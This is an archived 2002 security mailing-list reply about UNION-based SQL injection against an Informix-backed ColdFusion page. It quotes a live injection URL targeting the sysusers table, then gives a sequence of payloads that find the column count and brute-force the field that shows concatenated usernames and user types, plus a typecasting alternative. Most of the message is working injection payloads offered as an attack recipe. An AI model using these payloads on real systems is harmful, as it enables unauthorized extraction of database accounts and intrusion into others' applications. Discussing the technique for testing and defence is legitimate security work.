On Wed, 3 Jul 2002 16:28:18 -0600 "Whyte, Jesse" <Jesse.Whyteat_private> wrote: > http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%2 > 0usertype%20FROM%20sysusers > [Informix][Informix ODBC Driver][Informix]Corresponding column types must be > compatible for each UNION statement. .......................... hola, i never did a test on informix .. but ... The first test (queries) should be semething like: (using "1" should satisfy all different data types for all the other fields) check out a standard-table with many fields (or something like "dual" on oracle ..) ---*--- union select '1' from [TABLEX];-- union select '1','1' from [TABLEX];-- union select '1','1','1' from [TABLEX];-- union select '1','1','1','1' from [TABLEX];-- union select '1','1','1','1','1' from [TABLEX];-- union select '1','1','1','1','1','1' from [TABLEX];-- union select '1','1','1','1','1','1','1' from [TABLEX];-- union select '1','1','1','1','1','1','1','1' from [TABLEX];-- union select '1','1','1','1','1','1','1','1','1' from [TABLEX];-- union select '1','1','1','1','1','1','1','1','1','1' from [TABLEX];-- (and so on ...) ---*--- (using "1" should satisfy all different data types for all the other fields) .. you know that you hit the right column-number when there is no more error-message .. username and usertype could be concated "username||usertype" (check the "concat"-syntax for informix). so there is only one char, varchar, text(or similar) field left that you have to "hit directly". now try to brute-force any proper "query-signature" of the union statement: ---*--- union select '1',(username||usertype),['1'xnumber of fields] from sysusers;-- union select '1','1',(username||usertype),['1'xnumber of fields -1 ] from sysusers;-- union select '1','1','1',(username||usertype),['1'xnumber of fields -2 ] from sysusers;-- union select '1','1','1','1',(username||usertype),['1'xnumber of fields -3 ] from sysusers;-- union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields - 4] from sysusers;-- union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields -5 ] from sysusers;-- (and so on ...) ---*--- check the response for differences ... thaht should do the trick ... another possibility is "typecasting" every field withing the result-set into 1 type ("text" for example). (check out your informix-manual for the correct syntax). the only thing you have to guess (brute-force) with this method, is the number of fields in the result-set. hope that helps , nice day , martin meiat_private http://www.websec.org On Wed, 3 Jul 2002 16:28:18 -0600 "Whyte, Jesse" <Jesse.Whyteat_private> wrote: > http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%2 > 0usertype%20FROM%20sysusers > [Informix][Informix ODBC Driver][Informix]Corresponding column types must be > compatible for each UNION statement. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Jul 04 2002 - 12:53:34 PDT